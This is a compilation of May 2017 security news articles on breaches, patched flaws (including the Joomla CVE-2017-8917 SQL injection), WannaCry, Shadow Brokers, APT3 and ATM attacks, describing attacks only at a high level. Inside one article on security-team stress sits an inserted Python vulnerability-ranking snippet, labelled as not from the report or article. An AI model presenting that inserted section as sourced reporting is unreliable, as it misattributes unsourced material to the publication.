Zomato, which boasts 120 million user visits a month, said it was "plugging any security gaps" and would further enhance its security measures after the database breach.

The company -- a so-called "unicorn" startup because it is valued at more than $1 billion -- was founded in 2008 and it now operates in 23 nations.


Expert Earns $5,000 for Google Intranet Vulnerability

19.5.2017 securityweek Vulnerability
A researcher has earned a $5,000 bounty from Google after finding an information disclosure vulnerability in the login page for the tech giant’s intranet system.

Austria-based researcher David Wind was looking for a vulnerable Google service that could earn him a bug bounty when he came across login.corp.google.com, the login page for Google’s intranet, which is dubbed “MOMA.”

The login page is simple, but it does load a random image from static.corp.google.com every time it’s accessed. After unsuccessful attempts to obtain something from this domain, Wind generated a 404 error page by adding a random string to the URL.

Unlike other error pages displayed by Google to users, this one contained a link named “Re-run query with SFFE debug trace,” which pointed to the same URL with the string “?deb=trace” at the end.

The debugging page included various pieces of information, including server name and internal IP, X-FrontEnd (XFE) HTTP requests, service policies, and information related to Cloud Bigtable, Google's NoSQL big data database service.

“The page did not allow any user interaction and I haven’t found anything to ‘go deeper’ into the system so I reported it right away,” Wind said on his blog.

Google awarded the researcher $5,000 for his findings, which is the maximum amount for information leaks affecting highly sensitive applications.

The vulnerability was reported to Google on January 19 and a short-term fix was implemented some days later. The company told Wind that a permanent fix was rolled out on March 16.

The $5,000 reward earned by the researcher is significant compared to what other bug bounty programs pay, but it's small by Google's standards; the company offers more than $30,000 for remote code execution vulnerabilities.

The company has so far paid out more than $9 million since the launch of its bug bounty program in 2010, including over $3 million last year. The biggest single reward in 2016 was $100,000.


Cyberattacks Prompt Massive Security Spending Surge

19.5.2017 securityweek Cyber
The fight against cyberattacks has sparked exponential growth in global protection spending, with the cyber security market estimated at $120 billion this year, more than 30 times its size just over a decade ago.

But even that massive figure looks set to be dwarfed within a few years, experts said, after ransomware attacks crippled computers worldwide in the past week.

The "global cyber security market was worth $3.5 billion" in 2004, according to a study by cyber security research firm Cybersecurity Ventures, but in 2017, "we expect it to be worth more than $120 billion".

In the five years ending in 2021, the firm said it expected worldwide spending on cybersecurity products and services "to eclipse $1 trillion".

"It has clearly been a rapidly increasing market for many years, particularly in the last two or three years," said Gerome Billois, a cyber security expert with consulting firm Wavestone.

Much of the growth will be spurred by massive cyber attacks like the so-called "Wannacry" ransomware that struck targets in dozens of countries, ranging from British hospitals to Russian banks.

In what experts called an unprecedented mass cyberattack using ransomware, more than 200,000 computers around the world were hacked beginning Friday using a security flaw in Microsoft's Windows XP operating system, an older version that was no longer given mainstream tech support by the US giant.

The virus spread quickly because the culprits used a digital code believed to have been developed by the US National Security Agency -- and subsequently leaked as part of a document dump, according to the Moscow-based computer security firm Kaspersky Lab.

The attack blocks computers and puts up images on victims' screens demanding payment of $300 (275 euros) in the virtual currency Bitcoin, saying: "Ooops, your files have been encrypted!"

The massive attack has been a boon for cyber security firms, driving up stock prices of some while others, like six-year-old American start-up Crowdstrike, were able to raise $100 million in one day.

- Ransomware: 'key trend' -

High-profile attacks like WannaCry "drive the market," Ilex International president Laurent Gautier told AFP.

Ransomware attacks represent about 22 percent of all the incidents worldwide that NTT Security, an information security and risk management firm, handles for its clients, said Kai Grunwitz, the firm's senior vice president for central Europe.

That number jumps to 56 percent for financial firms.

"So these types of attacks are certainly one of the key trends" driving up spending on computer security systems and tools, Grunwitz said, but "buying more software or hardware products will not fix the problem -- awareness, procedures and a strategy aligned with the specific risk profile are key."

"Nevertheless, the global security market has grown in terms of revenue, and we see a very strong potential for additional growth in products but even more in consulting and managed security services over the next few years."

A still nascent industry just 12 to 13 years ago, the market gradually expanded because of the "digitisation of companies and countries" and the increasing online attacks which publicised the rising digital threat, Billois said.

"The growing wave of ransomware in 2014 created an enormous source of business for security research firms" because "companies were made aware of their vulnerabilities," said security expert Jerome Saiz.

Companies were slow to realise they needed to protect themselves since "the return on investment is impossible to determine," Saiz said, "and we cannot know which attacks we survived and how much they cost".

For large companies, putting in place an IT security strategy can cost tens of millions of dollars, he added.

Some, like French telecoms firm Orange, choose to bring security in-house. The telecoms giant bought cyber security firm Lexsi last year.

To better respond to the threat from the other side, smaller security firms have banded together to create alliances, like the group of French companies that formed Hexatrust in 2014.

Either way, software security companies like US anti-virus firm Symantec are reaping the benefits. The company "doubled" its share price in one year, said chief security strategist Laurent Heslault.

But the threat from ransomware is hardly the only danger on the horizon.

The hacking of interconnected appliances and other internet-connected things, the theft of personal and financial data, and hackers engaging in online political campaigns will all drive the market in the coming years.

The biggest troubles however will not come from an attack but a "skills shortage": "a million cyber security jobs worldwide actually remain unfilled," Heslault said.


EU Authorities Fight Back Against "Black Box" ATM Attacks

19.5.2017 securityweek Attack
Europol has announced that a total of 27 related arrests have been made since the ATM black box threat first emerged in 2015. Eleven arrests have been made in France, four in Estonia, three in the Czech Republic and Norway, and two in The Netherlands, Romania and Spain.

A black box attack is a logical attack against cash dispensers. It requires gaining access to the inner workings of the machine, usually, notes Europol, "by drilling holes or melting."

Once access is achieved, the cash dispenser is disconnected from its core working, and connected instead to the hacker's own electronic device -- the so-called black box. The attacker then simply issues the necessary commands to empty the cash dispenser; an act known as 'jackpotting', which bypasses any need for a card or transaction authorization.

Since a black box attack simply empties the whole machine, rather than attempting to extract available cash from an individual account, a single successful attack can potentially steal hundreds of thousands of Euros.

According to Europol, black box attacks have increased dramatically. It quotes a recent report from the European ATM Security Team (EAST) which reports 58 such attacks in 2016 compared to just 15 in 2015. In reality, however, the majority of attacks fail. Although the attacks increased, the related losses fell by 39% from €0.74 million to €0.45 million.

EAST attributes this fall largely to its own work. "While the rise in ATM black box attacks is a concern," said executive director Lachlan Gunn, "we are pleased to note that many of these attacks were not successful. In 2015, to help the industry counter such attacks, our EAST Expert Group on ATM Fraud (EGAF) worked with Europol to produce a document entitled 'Guidance & recommendations regarding logical attacks on ATMs'."

EAST will be leading a breakout session discussing black box attacks at the third global Financial Crime & Security (FCS) Forum, being held in The Hague on 8th/9th June 2017.

Despite the potential for high value individual attacks, black box attacks are rare in comparison to other ATM-related attacks. "ATM related fraud attacks increased by 26%, up from 18,738 in 2015 to 23,588 in 2016," reports EAST. "This rise was mainly driven by a 147% increase in Transaction Reversal Fraud (up from 5,104 to 12,581 incidents). The downward trend for card skimming continues with 3,315 card skimming incidents reported, down 20% from 4,131 in 2015. This is the lowest number of skimming incidents reported since 2005."

Overall, actual fraud-related ATM losses increased only marginally -- up by 2% from €327 million in 2015 to €332 million in 2016.


Zomato Data breach – Nearly 17 million usernames and hashed passwords stolen
19.5.2017 securityaffairs Incident

Nearly 17 million Zomato usernames and hashed passwords have been stolen by hackers; the company suspects it is an insider's job.
Nearly 17 million Zomato usernames and hashed passwords have been stolen by hackers.

Zomato is India's largest online restaurant guide. The company confirmed the data breach, announcing that hackers have stolen the account details of millions of its users.

“about 17 million user records from our database were stolen. The stolen information has user email addresses and hashed passwords.” reads the data breach notification issued by the company.

The company tried to downplay the incident, explaining that the hashed passwords are hard to recover.

“We hash passwords with a one-way hashing algorithm, with multiple hashing iterations and individual salt per password. This means your password cannot be easily converted back to plain text. We however, strongly advise you to change your password for any other services where you are using the same password.” continues the statement.

The reality is quite different: hackers could easily obtain the computational resources needed to crack the passwords.

Zomato confirmed that the hackers did not access users' financial information, which is stored in a separate database that was not involved in the attack.

“Payment related information on Zomato is stored separately from this (stolen) data in a highly secure PCI Data Security Standard (DSS) compliant vault. No payment information or credit card data has been stolen/leaked,” the company claims.

The company suspects that the hack is an insider’s job.

“Our team is actively scanning all possible breach vectors and closing any gaps in our environment. So far, it looks like an internal (human) security breach – some employee’s development account got compromised,” the company said.

According to the HackRead website, the data stolen by the hackers is already offered for sale on a dark web marketplace; the vendor “nclay” is offering the full dump for BTC 0.5587 (USD 1,001.43).

Zomato customers should change their password and stay vigilant for suspicious email, since crooks could exploit the stolen data to launch a phishing campaign.


Critical SQL Injection CVE-2017-8917 vulnerability patched in Joomla, update it now!
19.5.2017 securityaffairs Vulnerability

Joomla maintainers released a fix for a critical SQL injection flaw, tracked as CVE-2017-8917, that can be exploited by a remote attacker to hijack websites
On Wednesday Joomla maintainers released a fix for a critical SQL injection vulnerability, tracked as CVE-2017-8917, that can be easily exploited by a remote attacker to obtain sensitive data and hijack websites.

The vulnerability was reported by Sucuri researcher Marc-Alexandre Montpas; it only affects Joomla 3.7.0 because it is related to a new component introduced in this version.

“The vulnerability is caused by a new component, com_fields, which was introduced in version 3.7. If you use this version, you are affected and should update as soon as possible. This vulnerable component is publicly accessible, which means this issue can be exploited by any malicious individual visiting your site.” reads the analysis published by Sucuri.

“Given the nature of SQL Injection attacks, there are many ways an attacker could cause harm – examples include leaking password hashes and hijacking a logged-in user’s session (the latter results in a full site compromise if an administrator session is stolen).”

According to Montpas, the vulnerability only affects Joomla 3.7 because it is related to the new com_fields component introduced in this version. The component borrows views from an admin-side component of the same name. Unfortunately, com_fields is publicly accessible, which means that anyone can exploit the CVE-2017-8917 vulnerability without needing a privileged account on the vulnerable website. An attacker can leverage the flaw to inject nested SQL queries via a specially crafted URL.

Joomla users have been advised to update their installations to version 3.7.1.

Sucuri has published the technical details of the CVE-2017-8917 vulnerability; it is likely that threat actors will start exploiting it in the wild in the coming weeks.

“The only administrator view that can be accessed is fields – and this will grab its data from an admin-side model (due to the $config['base_path'] trick we discussed earlier). In this case, the vulnerability we discovered was located in the FieldsModelFields model, in ./administrator/components/com_fields/models/fields.php.” reads the analysis. “So in order to exploit this vulnerability, all an attacker has to do is add the proper parameters to the URL in order to inject nested SQL queries.”


Massive attacks on Joomla installations are dangerous events. In October 2016, Joomla released version 3.6.4 to fix two high severity vulnerabilities, CVE-2016-8870 and CVE-2016-8869. A combination of these flaws can be exploited to upload a backdoor and gain complete control of vulnerable Joomla websites.

Experts from Sucuri observed a spike in the number of attacks less than 24 hours after Joomla released the patches for the above critical flaws.


Critical SQL Injection Flaw Patched in Joomla

18.5.2017 securityweek Vulnerability
A Joomla update released on Wednesday patches a critical SQL injection vulnerability that can be easily exploited by a remote attacker to obtain sensitive data and hijack websites.

The flaw, discovered by Sucuri researcher Marc-Alexandre Montpas and tracked as CVE-2017-8917, affects Joomla 3.7.0 and it has been addressed with the release of version 3.7.1. This is the only security issue fixed in the latest version.

According to Montpas, the vulnerability only affects Joomla 3.7 because it’s related to a new component introduced in this version. The component in question is com_fields, which borrows views from an admin-side component that has the same name.

Since com_fields is a public-facing component, anyone can exploit the vulnerability without needing a privileged account on the targeted website. An attacker can leverage the flaw to inject nested SQL queries via a specially crafted URL.

“Given the nature of SQL Injection attacks, there are many ways an attacker could cause harm – examples include leaking password hashes and hijacking a logged-in user’s session (the latter results in a full site compromise if an administrator session is stolen),” Montpas warned in a blog post published on Wednesday.

Joomla users have been advised to update their installations as soon as possible. Joomla developers even issued a pre-release security announcement last week to inform users of the “very important security fix.”

While Sucuri has not released a proof-of-concept (PoC) exploit, it has made public the flaw’s technical details. Given that it’s easy to exploit, it would not be surprising to see attacks leveraging this vulnerability in the next days.

In October 2016, cybercriminals started exploiting a couple of Joomla vulnerabilities in less than 24 hours after they were patched, despite the fact that only limited technical details had been made public. At the time, attackers leveraged the flaws to create rogue user accounts on popular websites.

One year prior, attackers started hacking Joomla websites within hours after the details of a SQL injection vulnerability were disclosed by researchers. A few months later, Joomla developers rushed to patch a zero-day that had been exploited in the wild for at least two days before fixes were released.


People the New Perimeter as Hackers Target Users to Infiltrate Enterprises

18.5.2017 securityweek Hacking
Identity Governance is Key to Improving Security and Compliance

Getting breached is becoming part of doing business. More than half of respondents to a Market Pulse Survey reported that they had suffered two or more breaches during 2016; and 60% expect to be breached in 2017. The average material cost of each breach now stands at more than $4 million.

Identity firm SailPoint commissioned Vanson Bourne to interview 600 senior IT decision-makers at organizations with at least 1,000 employees across Australia, France, Germany, Italy, the United Kingdom and the United States. The key finding is that a lack of visibility into staff actions and access capabilities remains a major problem.

SailPoint was founded in 2005. In 2014, private equity firm Thoma Bravo took a sizeable stake in the company -- thought to be in excess of 'several hundred million'. In February 2017, the Wall Street Journal suggested that SailPoint is currently "laying the groundwork for a possible IPO filing later this year."

While the majority of respondents to the Market Pulse Survey claim to have at least partial visibility into users' access to corporate systems and applications, less than half have full visibility.

Complicating factors continue to be cloud (shadow IT) and mobility (BYOD). Ninety percent of respondents admitted that at least some of their employees procure and use applications without IT or Security oversight or approval. Coupled with the growing use of personal mobile devices, many organizations struggle to know where and by whom their data is being used.

Seventy percent of organizations have embraced BYOD; but less than half have a formal policy around its use for corporate data. The result is a lack of visibility into the whereabouts and indeed content of unstructured data. This exacerbates industry's two biggest problems: hackers' exploitation of identity to effect, maintain and expand their incursions; and compliance.

People are the new perimeter, suggests SailPoint. "But even as it's widespread knowledge that hackers are targeting users as their doorway into the enterprise, employees aren't helping matters with continued poor password hygiene. 37% of respondents," explains the report, "cited password hygiene as a big factor into their organization's overall risk profile -- with employees either sharing passwords across multiple accounts and systems, not regularly updating or changing their password or not adhering to overall password management policies."

Compliance issues are also growing. The European General Data Protection Regulation (GDPR) requires that companies don't simply protect European PII, but know precisely where it is located. The latter is necessary because GDPR gives EU citizens the right to have their PII removed from organizations' systems -- and that cannot be achieved if the organization doesn't know where it is located (for example, in unstructured data located on staff mobile devices or in shadow IT cloud storage systems).

The survey shows that this concern is particularly strong in Europe, even though the Regulation will apply to any business anywhere in the world that does business with the EU. "Specific to European respondents," notes the report, "compliance bubbled to the top for some regions as a key goal and driver behind identity governance programs." Nearly three-quarters (73%) of UK respondents, and nearly half of German (42%) and French (49%) respondents cited compliance as a reason for improving identity governance.

"There is a silver lining to our report," commented Kevin Cunningham, SailPoint's president and co-founder. "It's clear that now more than ever before, organizations better understand what -- and where -- their risks are, and that identity management can help address those risks. Identity provides that ability to put the detective and preventive controls in place to address all of these exposure points, while automating many identity-related processes to ensure that only the right people have the right access to applications and data at the right time."

He continued, "By putting identity at the center of security and IT operations, these organizations can move their IT teams out of full-time firefighting mode, freeing them up to focus on enabling the business to move forward, confidently and securely."

According to the survey, identity governance is recognized by 97% of respondents as a key solution to these problems; and 55% cite identity as a top security investment priority for 2017. Other benefits are considered to be enhanced security (72% of respondents), a more automated and efficient organization (71%), and business enablement (65%).


Shadow Brokers Promise More Exploits for Monthly Fee

18.5.2017 securityweek BigBrothers
The hacker group calling itself Shadow Brokers claims to possess even more exploits stolen from the NSA-linked Equation Group, and anyone can have them by paying a monthly “membership” fee.

The Shadow Brokers have been in the news over the past days after unknown threat actors leveraged two of the exploits they leaked to deliver WannaCry ransomware to hundreds of thousands of systems worldwide.

The attackers have used an exploit called EternalBlue, which leverages an SMB vulnerability in Windows, to distribute the ransomware without user interaction. Microsoft patched the flaw in March and over the weekend it made available fixes even for outdated versions of Windows.

Some people blamed Shadow Brokers for the devastating WannaCry attacks, arguing that the ransomware could not have spread so easily without the exploits they leaked. Others believe the existence of the vulnerability would have come to light at some point even without them leaking the exploit.

The Shadow Brokers insist that their main goal is to make money and to demonstrate that they are a “worthy opponent” of the Equation Group.

The hackers claimed Microsoft postponed its February security updates to address the EternalBlue and other Eternal exploits. However, they pointed out that they had waited for 30 days after Microsoft rolled out the fixes before releasing the exploits.

The WannaCry attacks led to Microsoft president and chief legal officer Brad Smith renewing his call for governments to stop stockpiling vulnerabilities and disclose them to affected vendors.

Shadow Brokers, however, claims the NSA and Microsoft are “BFFs,” with contracts of “millions or billions of USD each year.” Their other conspiracy theories include an agreement between the NSA and Microsoft over not patching vulnerabilities until they are publicly disclosed, and Microsoft fixing the recent SMB flaw in secret after the NSA lied about the exploits it had been using.

Shadow Brokers claims to possess much more data and exploits, and in June the group plans on launching a subscription-based “service.”

According to the hackers, people willing to pay a monthly fee will receive exploits for browsers, routers, mobile devices, and Windows (including Windows 10). The offer also includes SWIFT network data and information on Russian, Chinese, Iranian and North Korean nuclear and missile programs.

Judging by the group’s previous offers to sell the data for thousands and even tens of thousands of bitcoins, the membership fee will likely not be small.

However, if someone offers to buy the remaining exploits and data from the Shadow Brokers, the group said it will go dark permanently as it will no longer have any financial incentive to continue taking risks.

In January, after failed attempts to make money via auctions, crowdfunding and direct sales, Shadow Brokers announced that it was retiring. With the renewed interest in the exploits it possesses, the group has apparently come up with yet another strategy for making a profit.


WordPress Launches Public Bug Bounty Program

18.5.2017 securityweek Safety
The WordPress security team announced this week the launch of a public bug bounty program that covers the WordPress content management system (CMS) and several related assets.

WordPress has been running a private bug bounty program for roughly seven months and it has now decided to make it public.

The program is hosted on the HackerOne platform and it covers the WordPress CMS and other open-source projects, including BuddyPress, bbPress and GlotPress. Researchers can also report flaws discovered in the WordPress.org (including subdomains), WordCamp.org, BuddyPress.org, WordPress.tv, bbPress.org and Jobs.WordPress.net websites.

White hat hackers have been advised to submit vulnerability reports that include detailed information on the flaw and proof-of-concept (PoC) code. Participants have also been asked to avoid privacy violations and causing damage to live WordPress sites, and give developers a reasonable amount of time to address security holes before their details are made public.

The list of vulnerabilities that experts can report includes cross-site scripting (XSS), cross-site request forgery (CSRF), server-side request forgery (SSRF), remote code execution and SQL injection.

The bug bounty program does not cover vulnerabilities affecting plugins; those should be reported to the plugin’s developer, but the WordPress plugins team should be alerted as well.

While exceptions may exist, the WordPress security team says it’s typically not interested in basic information disclosure issues, mixed content warnings, lack of HTTP security headers, brute force attacks, XSS flaws that can only be exploited by users with elevated privileges, and reports generated by automated scans.

The WordPress security team has not provided any information on rewards, but it did say that seven researchers have so far earned more than $3,700 in total, which works out to roughly $500 per researcher. The bounties will be paid out by Automattic, the company behind WordPress.com, which runs its own bug bounty program on HackerOne.

According to WordPress developers, the CMS currently powers more than a quarter of the top ten million websites on the Internet. Given the platform’s popularity, it’s no surprise that researchers often find security holes, including serious vulnerabilities that end up being exploited to hack thousands of websites.

Hopefully, the launch of a public bug bounty program will streamline vulnerability reporting to avoid the disclosure of unpatched flaws by researchers who are frustrated with the lack of communication.


Ukraine's Presidency Says Website Attacked by Russia

18.5.2017 securityweek Hacking
The Ukrainian presidency said its website had been attacked by Russia in apparent retaliation for Kiev's decision to block prominent Moscow-based social networks.

"We have been witnessing the Russian response to the president's decree about closing access to Russian social networks," President Petro Poroshenko's deputy administration chief Dmytro Shymkiv said in a statement posted late Tuesday on Facebook.

"The president's website has sustained an organised attack."

Shymkiv added that IT specialists had the situation under control and that the website was no longer under threat. It was accessible on Wednesday in Kiev.

Kremlin spokesman Dmitry Peskov called Kiev's accusations unfounded.

"The absence of anything concrete (in Ukraine's claim) once again confirms the absolute baselessness of such accusations," Peskov told reporters.

IT specialists and Western governments are rarely able to pin a hacking attack directly on the Kremlin but often accuse groups or individuals close to the Russian government of being responsible for them.

Ukraine on Tuesday blocked Russia's most popular social media networks and an internet search engine in response to the Kremlin's backing of a three-year separatist war in the east and annexation of Crimea in March 2014.

The decision sparked an outcry from Ukrainian internet users and freedom of speech advocates.

"In a single move Poroshenko dealt a terrible blow to freedom of expression in Ukraine," Human Rights Watch researcher Tanya Cooper said.

"It's an inexcusable violation of Ukrainians' right to information of their choice," she said in a statement Wednesday.

It also sowed confusion among Ukraine's internet providers about how precisely such a ban would work.

The Internet Association of Ukraine sent a letter to Poroshenko and top government agencies asking how it should proceed since the former Soviet republic had no laws setting guidelines for blocking traffic to specific websites.

Several of the banned Russian social media sites published instructions explaining how their users could circumvent the ban using openly available internet tools.


APT3 Hackers Linked to Chinese Ministry of State Security

18.5.2017 securityweek APT
Independent researchers and experts from threat intelligence firm Recorded Future are confident that the cyber espionage group tracked as APT3 is directly linked to the Chinese Ministry of State Security (MSS).

While much of the security community typically tries to avoid making attribution statements, arguing that false flags make this task difficult, there are some individuals and companies that don’t shy away from accusing governments of conducting sophisticated cyberattacks.

A mysterious group called “intrusiontruth,” which claims to focus on investigating some of the most important advanced persistent threat (APT) actors, has recently published a series of blog posts on APT3, a group that is also known as UPS Team, Gothic Panda, Buckeye and TG-0110.

The cyberspies, believed to be sponsored by China, have been active since at least 2009, targeting many organizations in the United States and elsewhere via spear-phishing, zero-day exploits, and various other tools and techniques. Researchers noticed last year that APT3 had shifted its attention from the U.S. and the U.K. to Hong Kong, where it had mainly targeted political entities using a backdoor dubbed “Pirpi.”

Intrusiontruth has conducted an analysis of APT3’s command and control (C&C) infrastructure, particularly domain registration data. Their research led to two individuals, named Wu Yingzhuo and Dong Hao, who apparently registered many of the domains used by the threat actor.

Both these individuals are listed as shareholders for a China-based security firm called the Guangzhou Boyu Information Technology Company, or Boyusec. In November 2016, the Washington Free Beacon learned from Pentagon intelligence officials that this company had been working with Chinese telecoms giant Huawei to develop spyware-laden security products that would be loaded onto computers and phones. The unnamed officials said Boyusec was “closely connected” to the Chinese Ministry of State Security.

Intrusiontruth concluded that either Boyusec has two shareholders with the same name as members of APT3, or Boyusec is in fact APT3, which is the more likely scenario.

Recorded Future has dug deeper to find more evidence connecting APT3 to China’s MSS. In a report published on Wednesday, the company said it had attributed the group directly to the MSS with “a high degree of confidence.”

Researchers pointed out that in addition to Huawei, which claimed to use Boyusec for security evaluations of its corporate intranet, Boyusec was also a partner of the Guangdong Information Technology Security Evaluation Center (Guangdong ITSEC), and the organizations have been collaborating on an active defense lab since 2014.

Guangdong ITSEC is apparently subordinate to the China Information Technology Security Evaluation Center (CNITSEC), which, according to academic research, is run by the Ministry of State Security.

Experts believe many of the ministry’s subordinates, particularly those at provincial and local levels, have legitimate public missions that serve as cover for intelligence operations.

“Companies in sectors that have been victimized by APT3 now must adjust their strategies to defend against the resources and technology of the Chinese government. In this real-life David vs. Goliath situation, customers need both smart security controls and policy, as well as actionable and strategic threat intelligence,” Recorded Future said in its report.


Schneider Patches Flaws in VAMPSET, SoMachine Products

18.5.2017 securityweek Vulnerability
Updates released by Schneider Electric for its VAMPSET and SoMachine HVAC products patch several medium and high severity vulnerabilities that can be exploited for denial-of-service (DoS) attacks and arbitrary code execution.

Advisories describing the flaws were published recently by both ICS-CERT and Schneider Electric.

One of the advisories focuses on a medium severity memory corruption vulnerability affecting VAMPSET, a piece of software used to configure and maintain protection relays and arc flash protection units. The bug, tracked as CVE-2017-7967, can be triggered using a specially crafted settings file (.vf2).

“This vulnerability causes the software to halt or not start when trying to open the corrupted file,” Schneider wrote in its advisory. “As Windows operating system remains operational and VAMPSET responds, it is able to be shut down through its normal closing protocol.”

According to Fortinet’s Kushal Arvind Shah, the researcher who reported the flaw to the vendor, an attacker may also be able to exploit the weakness for arbitrary code execution.

The flaw has been addressed with the release of VAMPSET 2.2.189. All previous versions are affected.

Separate advisories describe two high severity vulnerabilities found by independent researchers in Schneider’s SoMachine HVAC product, a programming software for Modicon logic controllers. Both security holes have been patched with the release of SoMachine HVAC 2.2.

One of the flaws, CVE-2017-7965, is a DLL hijacking issue that can be exploited by a remote, unauthenticated attacker to execute arbitrary code by planting a malicious library that gets loaded in place of the legitimate one.

The second vulnerability, classified as a stack-based buffer overflow and tracked as CVE-2017-7966, is related to a component named AlTracePrint.exe. Schneider and ICS-CERT have not shared any details, but mentioned that the component can be called in a way that leads to a buffer overflow and a crash.

Last month, researchers from Germany-based OpenSource Security disclosed a couple of critical vulnerabilities in Schneider’s Modicon and SoMachine products before the vendor released patches.

The experts reported the flaws to the company in December and decided to make their findings public after not receiving any feedback. Schneider admitted making a mistake and promised to release fixes in mid-June.


What's Driving Stress Levels of Security Operations Teams?

18.5.2017 securityweek Security
Security Operations Teams Are Overwhelmed by Vulnerabilities and Volume of Threat Alerts, Study Finds

One of the reasons the WannaCrypt ransomware spread so far and so fast is that it leveraged what was, for some Windows users, a 0-day exploit and, for others, an n-day exploit. For users of unsupported Windows versions it was a 0-day: there had been no patch. For many users of supported versions it was an n-day exploit, that is, one used during the variable n days between Microsoft issuing a patch and the user applying it.

N-day exploits are an increasing problem because, if anything, the time between issue and implementation of patches is increasing.

A new study, prepared for Bay Dynamics by EMA and published today, helps to explain why this is happening. Bay Dynamics, a maker of cyber risk analytics software, completed a $23 million Series B financing round in July 2016.

Four hundred security professionals ranging from management to operational staff in mid-market, enterprise and very large enterprise organizations and representing a wide range of industry sectors were questioned about stress in their daily lives.

What emerged, in a nutshell, is that operations staff are overwhelmed by the sheer volume of vulnerabilities; they are falling behind in efforts to remediate them; and tend to under-report the problem to their seniors.

To put this into context, a mid-market firm might on average have 10 full-time staff servicing ten new vulnerabilities per asset per month across just under 2,000 assets, almost 20,000 vulnerabilities to service every month. For a very large enterprise those figures translate to 100 staff servicing more than 1.3 million vulnerabilities every month. Seventy-four percent of security teams admit they are overwhelmed by the volume of maintenance work required.

Since full and timely patching is an impossibility, security teams are required to prioritize their efforts -- but this is also a problem. Nearly 80% of the respondents admitted that their patching approval process is significantly manual. "This," notes the report, "included emails, spreadsheets, and other electronic documents for tracking and approval. With the volumes of patching that have to be reviewed, these labor intensive manual steps drive high inefficiencies and stress."

To be fair, 'too many vulnerabilities' is not considered to be the primary stress driver for security teams. It ties in second place (at 21%) with stress caused by management, one point behind the primary cause of stress, 'not enough manpower'. The report postulates that security teams "are creating a security facade around their security program maturity. This could be a natural extension of what they are conveying to their upper management."

If this is true, it would go a long way to explain the often-discussed disparity between operations staff and senior management over the maturity of an organization's security posture: senior management invariably claims a more mature posture than that reported by security operations.

The survey also makes clear that the prioritization of vulnerabilities and threats is also problematic. Sixty-eight percent of respondents prioritize vulnerabilities based on their severity. This severity is relatively easy to gauge from the vendor's alert and the IT infrastructure. Threats, however, are a little different.

Fifty-eight percent of respondents prioritize vulnerabilities based on the severity of identified threats, but 52% of threat alerts are improperly prioritized by the systems that generate them and must be manually reprioritized.

"While severity of alerts should be a key indicator of how both vulnerabilities and threats should be prioritized for action by operations," suggests the report, "it is not the only factor and should not be considered the primary indicator unless the prioritization algorithm has sufficient context within its framework."

The problem here is that the majority of current alerting systems, such as SIEMs, do not usually provide sufficient context for automatic priority decision-making. Newer machine-learning anomaly detection systems have the potential, eventually, to provide better and more complete context; but for now, they are known to create a high level of false positives.
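As an added illustration (not from the report or this article), the following Python ranks one constructed set of findings two ways: by CVSS alone, as 68% of respondents do, and by CVSS weighted with the kind of context the report asks for (exposure, exploit status, asset criticality). The multipliers and the four sample findings are assumptions chosen for the example; the point is how far the two orderings diverge.

```python
"""Context-aware vulnerability ranking: severity alone vs. severity plus context."""

# Illustrative multipliers (assumptions for this example, not values from the report).
EXPOSURE_FACTOR = {"internet": 1.5, "internal": 1.0, "isolated": 0.5}
ASSET_FACTOR = {"high": 1.5, "medium": 1.0, "low": 0.7}


def exploit_factor(vuln):
    """Weight by how real the threat is: actively exploited > public exploit > none."""
    if vuln.get("actively_exploited"):
        return 2.0
    if vuln.get("public_exploit"):
        return 1.5
    return 1.0


def context_score(vuln):
    """CVSS base score scaled by exposure, exploit status and asset criticality."""
    return (vuln["cvss"]
            * EXPOSURE_FACTOR[vuln["exposure"]]
            * exploit_factor(vuln)
            * ASSET_FACTOR[vuln["asset_criticality"]])


def rank_by_severity(vulns):
    """Severity-only ordering: vendor CVSS score, highest first."""
    return [v["id"] for v in sorted(vulns, key=lambda v: v["cvss"], reverse=True)]


def rank_with_context(vulns):
    """Context ordering: (id, score) pairs, highest score first."""
    scored = [(v["id"], round(context_score(v), 3)) for v in vulns]
    return sorted(scored, key=lambda pair: pair[1], reverse=True)


# Constructed sample findings (hypothetical, for illustration only).
SAMPLE_VULNS = [
    # Critical CVSS, but on an isolated, low-value lab machine with no known exploit.
    {"id": "V-A", "cvss": 9.8, "exposure": "isolated", "asset_criticality": "low",
     "public_exploit": False, "actively_exploited": False},
    # High (not critical) CVSS, but internet-facing, business-critical and exploited in the wild.
    {"id": "V-B", "cvss": 8.1, "exposure": "internet", "asset_criticality": "high",
     "public_exploit": True, "actively_exploited": True},
    # Medium CVSS with a public exploit on an internet-facing host.
    {"id": "V-C", "cvss": 5.3, "exposure": "internet", "asset_criticality": "medium",
     "public_exploit": True, "actively_exploited": False},
    # High CVSS, internal only, no exploit, but a critical asset.
    {"id": "V-D", "cvss": 7.5, "exposure": "internal", "asset_criticality": "high",
     "public_exploit": False, "actively_exploited": False},
]

if __name__ == "__main__":
    print("severity only:", rank_by_severity(SAMPLE_VULNS))
    print("with context :", rank_with_context(SAMPLE_VULNS))
```

With these inputs the severity-only queue puts the unreachable lab box first and the actively exploited, internet-facing service second; the context score reverses that and pushes the lab box to the bottom. The multipliers are the part that needs tuning per organization, which is exactly the "sufficient context" the report says most alerting systems lack.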

The difficulty of automatically and correctly prioritizing vulnerabilities delays their remediation. Analysts spend between 24 and 30 minutes investigating each alert and are falling behind: 64% of alert tickets go unworked each day, and the backlog keeps growing, which helps explain why breach "dwell time" exceeds six months.

There are two possible solutions. The first is more manpower, but given the scarcity of suitable security analysts this would be difficult. The second is automation through better security tools.

"To succeed," suggests the report, "tools must be made smarter by providing more useful context around the technical, financial, and behavioral aspects of the incidents. This will reduce the number of false positives and misclassified alerts so that only the real, most critical threats are at the top of the investigation pile." If this can be achieved, "a day in the life of a security pro will become significantly less stressful." And the next WannaCrypt perhaps a little less successful.


WannaCry Ransomware Creators Make Rookie Mistake

18.5.2017 securityweek Ransomware
WannaCry Ransomware Didn't Utilize Trackable Bitcoin Wallets

A bug in the WannaCry ransomware prevented the malicious application from generating individual Bitcoin wallets to collect payments from each of its victims, security researchers have discovered.

WannaCry began wreaking havoc worldwide on May 12, courtesy of a worm component that abuses the NSA-linked EternalBlue exploit. By targeting an already patched Windows SMB vulnerability, the exploit turned an otherwise run-of-the-mill ransomware family into an international threat within hours.

An earlier WannaCry version appears connected to the North Korean threat group Lazarus, but the variant used in the still-ongoing campaign has nothing out of the ordinary, researchers say. In fact, researchers have already found bugs in the malware's code, although its encryption scheme has not been broken so far.

In a recent tweet, Symantec Security Response reveals that a race condition bug prevented the malware from using a unique Bitcoin address for every victim. The issue resulted in the ransomware using only three wallets for collecting ransom payments, which prevents its operators from tracking the payments to specific victims.

